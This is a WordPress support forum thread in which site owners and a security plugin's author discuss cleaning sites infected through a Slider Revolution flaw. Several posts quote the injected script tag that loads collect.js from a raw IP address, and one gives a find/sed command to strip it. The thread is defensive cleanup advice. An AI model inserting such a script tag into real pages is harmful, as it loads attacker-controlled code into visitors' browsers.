Support » Plugin: Anti-Malware Security and Brute-Force Firewall » MW:SPAM:SEO spam problem

  • Resolved th3rion

    (@th3rion)


    Hi

    I recently had a problem with backdoor trojans and malware. On my server 9 sites where infected. With this plugin I managed to get rid of infection on all of them but I can’t clean one.

    This plugin says site is clean but Sucuri detects MW:SPAM:SEO

    I manually updated all of wp core files so everything should have same date but some of files have newer date. I compered oryginal core files and this modified files and all of theme have somewhere script with such link:

    I don’t know where to look for cause of infection – I think updating files wont help.

    https://wordpress.org/plugins/gotmls/

Viewing 15 replies - 16 through 30 (of 58 total)
  • Plugin Author Eli

    (@scheeeli)

    My plugin will remove that script tag from every file on your site if you have the latest Definition update installed.

    If you are looking for a command-line solution andrijaf already mentioned a command to do this earlier in this support thread. However, as your script tag is a little different, I would recommend a slight alteration:

    find ./ -name “*.html” -or -name “*.php” -exec sed -i ‘s#<script.*?src=\”http:\/\/122.155.168.105\/ads\/inpage\/pub\/collect.js\”.*?><\/script>##g’ ‘{}’ \;

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    the quick fix?

    1. If the current theme is (folder renamed)
    2. New theme uploaded instead … will it work?

    but, then, can this plugin protect next attacs?

    Not to rain on anyones parade again but that won’t work. When your site is hacked then you need to delouse your installation. Just renaming things doesn’t do that and is ineffective for the backdoors that get installed that you haven’t found.

    We got hit by this thing as well. It my my wordpress site, sub-domains, and my custom html and php pages. Luckily I was able to restore from a recent backup, then patched up everything I could and installed Wordfence and Eli’s Malware to keep an eye on things. Great job on the Malware program Eli, I will be donating shortly!!!!!

    Does anyone have any other suggestions on programs to keep an eye or block this out from happening again?

    FYI, I also have Rev Slider, could that be the weakness?

    Does anyone have any clue what that collect.js was actually collecting?

    Old versions of rev slider is (pretty much) confirmed to have the vulnerability. Update to the latest. I don’ think this will clean your site, but it is supposed to be preventative. http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380

    Plugin Author Eli

    (@scheeeli)

    Not only does my plugin remove all these script injections mentioned in this threat but now it automatically blocks the root cause of most of these new infections.

    I just release a new plugin update that automatically blocks attempts to exploit the Slider Revolution vulnerability. Install version 4.14.51 of my Anti-Malware plugin and your site will be protected from this Local File Inclusion (LFI) threat.

    ok. sounds good,

    I have installed other plugins such as

    Wordfence
    Firewall 2
    Acunetics

    should I delete them or how do they interact with your plugin?

    thanks for quick answers

    I have a couple sites infected and blocked and noticed the script immediately as well. (Files changed 12/14/2014. Callout script: <script type=”text/javascript” src=”http://122.155.168.105/ads/inpage/pub/collect.js”></script&gt;)

    Since the /wp-login is blocked due to the script (I think), I am downloading the full sites using Dreamweaver and doing a full site find and replace using the script code and replacing with blank space. After that, I will reupload all the changed files, then log in to WP, install and load up Eli’s plugin: https://wordpress.org/plugins/gotmls/ (thanks for that Eli), run a full scan using it and then check the sites using Google Webmaster tools to see if everything has been removed.

    I’ll post back once this is done and let you know how it goes.

    I found at: /wp-admin/install.php someone confirm me whether there has also

    my scan found around 20 infected files. The code is injected just before the ending /head tag.

    My method mentioned above appears to have worked. My sites are back online after requesting Google rescan and whitelist them again. Further scans reveal no infections. Eli, nice plugin, sir! Will send some money your way…

    This code will inject itself to just about every js, php, and html page you have. Use Eli’s code to clean it if you can access your wp-admin. If not hopefully your host has a backup to restore to, makes it a ton easier.

    Also guys, with the full version of wordfence you can utilize their country block to block all traffic coming from particular countries like Russia and Taiwan. Prolly won’t help proxies, but it can help you cut it down.

    Eli, it seems to be catching lots of problems (2 backdoor scripts and 92 known threats and I’m only at 18%), if it works I will regard you as God and make a donation.

    Hi
    well i am facing the same issue.
    Now i am scanning with Eli plugin,which i thanks in advance and that probably will deserve my donation.
    I have wp installation on a subfolder, in the meanwhile i found many files (html but maybe also others…) that has been “injected” also in a root domain. So I wonder if the Eli plugin could scan also the root, or it start on the directory where is installated.
    If you have other solution for scan other folders or root, or even an instructions how to use a command line, i will appreciate it
    thanks Eli and good luck to all

    Plugin Author Eli

    (@scheeeli)

    My plugin is supposed to detect the directory level of the root site, but that doesn’t always work right on some site that are installed in a sub-directory.

    You can change the scan_level value in the DB from i:3 to i:4 to get at the parent directory. The scan_level value is stored in the wp_options table where the option_name equals ‘GOTMLS_settings_array’. Be careful changing that value though because it’s a serialized array, so one wrong character and it won’t be readable by my plugin. Changing that one simple value should be safe though (the worst thing that could happen if you get it wrong would be that all the settings go back to the defaults).

    Alternatively, you can email me your Installation Key and I can upgrade your scan_level in the Definition Updates.

    Thanks again to everyone for contributing to my plugin. I’m really exited that it’s now able to fend of this new threat that has already hit so many WordPress sites.

    Please let me know if there is anything else.

    Aloha, Eli

Viewing 15 replies - 16 through 30 (of 58 total)
  • The topic ‘MW:SPAM:SEO spam problem’ is closed to new replies.